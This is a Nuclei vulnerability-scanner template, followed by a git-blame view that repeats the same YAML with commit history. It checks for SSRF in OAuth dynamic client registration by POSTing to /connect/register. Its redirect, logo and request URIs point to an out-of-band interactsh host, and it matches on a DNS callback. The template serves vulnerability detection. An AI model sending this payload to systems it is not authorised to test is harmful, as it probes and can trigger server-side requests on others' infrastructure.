nuclei-templates/http/misconfiguration/ssrf-via-oauth-misconfig.yaml

id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  reference:
    - https://portswigger.net/research/hidden-oauth-attack-vectors
  metadata:
    max-request: 1
  tags: misconfig,oast,oauth,ssrf,intrusive

http:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Language: en-US,en;q=0.9

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

# digest: 4a0a0047304502203fcc2073e897e6aa2522f1dc38806fc2724d9858a7aeb6279d37b472ffcbddc30221008922df4d809dfc40f100f7cc349955f6d29a365d06e9f8741d833e27c4b66d69:922c64590222798bb761d5b6d8e72950
Update ssrf-via-oauth-misconfig.yaml 2023-03-31 11:42:54 +00:00			`id: ssrf-via-oauth-misconfig`
Revert "Delete ssrf-via-oauth-misconfig.yaml" This reverts commit 9eb3d4a300a7fbdb73678d24963b942c379f43c6. 2023-03-31 11:34:14 +00:00
			`info:`
			`name: SSRF due to misconfiguration in OAuth`
			`author: KabirSuda`
			`severity: medium`
			`description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.`
			`reference:`
			`- https://portswigger.net/research/hidden-oauth-attack-vectors`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: misconfig,oast,oauth,ssrf,intrusive`
Revert "Delete ssrf-via-oauth-misconfig.yaml" This reverts commit 9eb3d4a300a7fbdb73678d24963b942c379f43c6. 2023-03-31 11:34:14 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Revert "Delete ssrf-via-oauth-misconfig.yaml" This reverts commit 9eb3d4a300a7fbdb73678d24963b942c379f43c6. 2023-03-31 11:34:14 +00:00			`- raw:`
			`- \|`
			`POST /connect/register HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`
			`Accept-Language: en-US,en;q=0.9`

			`{`
			`"application_type": "web",`
			`"redirect_uris": ["https://{{interactsh-url}}/callback"],`
			`"client_name": "{{Hostname}}",`
			`"logo_uri": "https://{{interactsh-url}}/favicon.ico",`
			`"subject_type": "pairwise",`
			`"token_endpoint_auth_method": "client_secret_basic",`
			`"request_uris": ["https://{{interactsh-url}}"]`
			`}`

			`matchers:`
			`- type: word`
templateman update 2023-10-14 11:27:55 +00:00			`part: interactsh_protocol # Confirms the DNS Interaction`
Revert "Delete ssrf-via-oauth-misconfig.yaml" This reverts commit 9eb3d4a300a7fbdb73678d24963b942c379f43c6. 2023-03-31 11:34:14 +00:00			`words:`
templateman update 2023-10-14 11:27:55 +00:00			`- "dns"`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a0047304502203fcc2073e897e6aa2522f1dc38806fc2724d9858a7aeb6279d37b472ffcbddc30221008922df4d809dfc40f100f7cc349955f6d29a365d06e9f8741d833e27c4b66d69:922c64590222798bb761d5b6d8e72950`